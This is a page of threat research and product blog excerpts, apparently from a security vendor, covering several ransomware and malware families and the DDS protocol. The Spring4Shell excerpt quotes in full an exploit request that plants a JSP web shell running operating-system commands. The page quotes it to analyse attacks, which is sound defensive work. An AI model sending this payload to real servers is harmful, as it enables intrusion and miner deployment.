Cloud-Native App Security Platform

The cloud is driving transformative benefits for global organizations. But in rushing their applications and infrastructure into new computing environments, they’re also exposing business-critical data to new risks. There are now more ways for the bad guys to steal data, deploy malware, hijack resources, and hold them to ransom. The complexity of hybrid and multi-cloud environments and the need to coordinate across multiple stakeholder groups further compound these challenges. The answer is a simple, flexible,…

Examining the Black Basta Ransomware’s Infection Routine

Ransomware
We analyze the Black Basta ransomware and examine the malicious actor’s familiar infection tactics.
By: Ieriz Nicolle Gonzalez, Ivan Nicole Chavez, Katherine Casona, Nathaniel Morales. May 09, 2022
Black Basta, a new ransomware gang, has swiftly risen to prominence in recent weeks after it caused massive breaches to organizations in a short span of time. On April 20, 2022, a user named Black…

NetDooka Framework Distributed via PrivateLoader Malware as Part of Pay-Per-Install Service

Malware
This report focuses on the components and infection chain of the NetDooka framework. Its scope ranges from the release of the first payload up until the release of the final RAT that is protected by a kernel driver.
By: Aliakbar Zahravi, Leandro Froes. May 05, 2022
We recently encountered a fairly sophisticated malware framework that we named NetDooka after…

AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell

Conclusion While AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note that other remote access applications can also be abused to replace it. We think the same can be said for the software deployment tool, wherein the malicious actors can subsequently decide to replace and abuse it with other commercially available ones. In addition, aside from its availability, the decision to choose the specific rootkit driver…

New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware

We dubbed these downloaders PuppetDownloaders since they are connected to the PuppetLoader malware family, as evidenced by our observations: This malware and PuppetLoader both use the same string decryption routine that uses the same key. This malware and PuppetLoader both use the same XOR key (2726c6aea9970bb95211304705b5f595) that is used to decrypt the embedded Loader.dll file. This malware and PuppetLoader’s decrypted Loader.dlls share similar strings such as “[-] UnExist pwszModuleFunName:”. This suggests that a common framework…

Here’s a Path to Better Attack Surface Risk Management

So, how can security leaders stay on top of their attack surface and ahead of the bad guys? By leveraging a unified cybersecurity platform that enables continuous security visibility and monitoring across the discovery, assessment, and mitigation phases of the attack surface risk lifecycle. Let’s dive deeper into how a platform can enhance attack surface risk management versus utilizing point products. Discover your digital attack surface First, you need total visibility to be able to…

Attack Surface Management Partner Bit Discovery Bolsters Offering

Security starts with visibility: you can’t protect what you can’t see. And yet, this is a perennial problem in cybersecurity. We’re excited to bring attack surface discovery capabilities to the Trend Micro One platform, providing ongoing visibility to internal assets (devices, identities, applications) but also external, Internet-facing assets. And we’re doing the latter in partnership with Bit Discovery, an innovative start-up founded by Jeremiah Grossman (previously co-founder of WhiteHat Security). How bad is the attack…

Spring4Shell Vulnerability CVE-2022-22965 Exploited to Deploy Cryptocurrency Miners

Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners. The following code is used to create the web shell: GET /?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP/1.1 Host: <redacted>:<redacted> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: */* Accept-Language: en-US,en;q=0.5 X: <% Y: Runtime Z: %>// Accept-Encoding: gzip   The web shell’s…

Critically Underrated: Studying the Data Distribution Service (DDS) Protocol

By Federico Maggi, Rainer Vosseler (Trend Micro Research), Mars Cheng, Patrick Kuo, Chizuru Toyama, Ta-Lun Yen (TXOne Networks), Erik Boasson (ADLINK), and Victor Mayoral Vilches (Alias Robotics)
Despite being unknown even to industry practitioners, the Data Distribution Service (DDS) protocol has been in use for more than a decade. This middleware software technology is responsible for running billions of public and private devices and mechanisms currently in use. DDS is integral in embedded systems that…

An Investigation of the BlackCat Ransomware via Trend Micro Vision One

Ransomware
We recently investigated a case related to the BlackCat ransomware group using the Trend Micro Vision One™ platform, which comes with extended detection and response (XDR) capabilities. BlackCat (aka AlphaVM or AlphaV) is a ransomware family created in the Rust programming language and operated under a ransomware-as-a-service (RaaS) model.
By: Lucas Silva, Leandro Froes. April 18, 2022
We recently…
